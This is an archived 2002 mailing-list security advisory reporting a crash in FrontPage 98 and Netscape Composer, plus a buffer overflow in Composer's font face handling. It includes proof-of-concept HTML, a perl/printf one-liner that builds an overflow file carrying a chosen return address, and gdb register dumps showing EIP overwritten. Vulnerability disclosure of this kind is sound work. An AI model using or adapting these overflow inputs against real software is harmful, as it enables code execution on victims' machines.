Microsoft FrontPage vs Composer Netscape...

From: S[h]iff - [ISR] - Infobyte Security Research (sh1ffat_private)
Date: Thu Jun 13 2002 - 04:31:03 PDT

Next message: Jon Keating: "RE: remote DoS in Mozilla 1.0"

Previous message: mattmurphyat_private: "Re: Microsoft releases critical fix that breaks their own software!"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

:::                [ISR]                 :::
::: Infobyte Security Research :::
 ::    www.infobyte.com.ar     ::
         ::::::::::::::::::::::::::::::


.::Software Affected: 

 - Microsoft FrontPage 98 
 - Composer, Netscape 4.77/U.S ..(< or > ??)..

.::Type of Problem:

 - Design Error
 - Buffer Overflow

.::Problem:

* Design Error:
----------

When a file in HTML is created that contains
for example;

------------------------------
<html>
<body>

<font face="">Hola!</font>

</body>
</html>
------------------------------

The FrontPage and Composer crash, 
for a bad manipulation <font face="">
(blank arguments).


* Buffer Overflow :
-----------------

The Composer contains uncheck buffer
in the label face, if you put a argument
of >=191 bytes write part of memory

for example;

------------------------------
<html>
<body>

<font face="AAAAAAAAAAAA..[191]">Hola!</font>

</body>
</html>
------------------------------
(A >= 191)

--------
[ gdb logs ]
--------

(gdb) set args '-composer'
(gdb) run
Starting program: /usr/bin/netscape '-composer'

Program received signal SIGSEGV, Segmentation fault.
0x846e6bb in CEditElement::SetTagData () at eval.c:88
(gdb) info all-registers
eax            0x0      0
ecx            0xffffffff       -1
edx            0x90a3be0        151665632
ebx            0x90a3be0        151665632
esp            0xbfffe0d4       0xbfffe0d4
ebp            0xbfffe0e4       0xbfffe0e4
esi            0x12147820       303331360
edi            0x12147820       303331360
eip            0x846e6bb        0x846e6bb
eflags         0x10246  66118


*But the program begin to write ret address memory, when
A if = 197 byte, check this !

# printf "<html>\n</body>\n<font face=\"`perl -e 'printf "A"x197'``perl -e 
'printf "\x78\x56\x34\x12"'`\"> Hola! </font>\n</body>\n</html>" >> source.htm

source.htm created contains ;

---------------------------
<html>
<body>

<font face="AAAAAAAAAAAA..[197][ret address 0x12345678]">Hola!</font>

</body>
</html>
---------------------------


 -------
[ gdb logs ]
 -------


# gdb netscape

(gdb) set args '-composer'
(gdb) run
Starting program: /usr/bin/netscape '-composer'

 * "Here = does the program loaded the html file with AAA.. in the face args"

Program received signal SIGSEGV, Segmentation fault.
[[0x12345678]] in ?? () at eval.c:88

(gdb) info all-registers
eax            0x9003e22        151010850
ecx            0x0      0
edx            0x25c00900       633342208
ebx            0x90a39a0        151665056
esp            0xbfffe0c0       0xbfffe0c0
[ebp            0x41414141       0x41414141]
esi            0x90d6000        151871488
edi            0xbfffe0ec       -1073749780
[eip            0x12345678       0x12345678]
eflags         0x10246  66118


I check this b0fs in Slackware 8.0, and the netscape isn't installed setuid 
root by default.
I didn't check other distributions
Sorry for my poor English.

Salutes  ``S[h]iff``
[ISR] - Crew! Mal0r..

Next message: Jon Keating: "RE: remote DoS in Mozilla 1.0"
Previous message: mattmurphyat_private: "Re: Microsoft releases critical fix that breaks their own software!"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jun 13 2002 - 17:15:47 PDT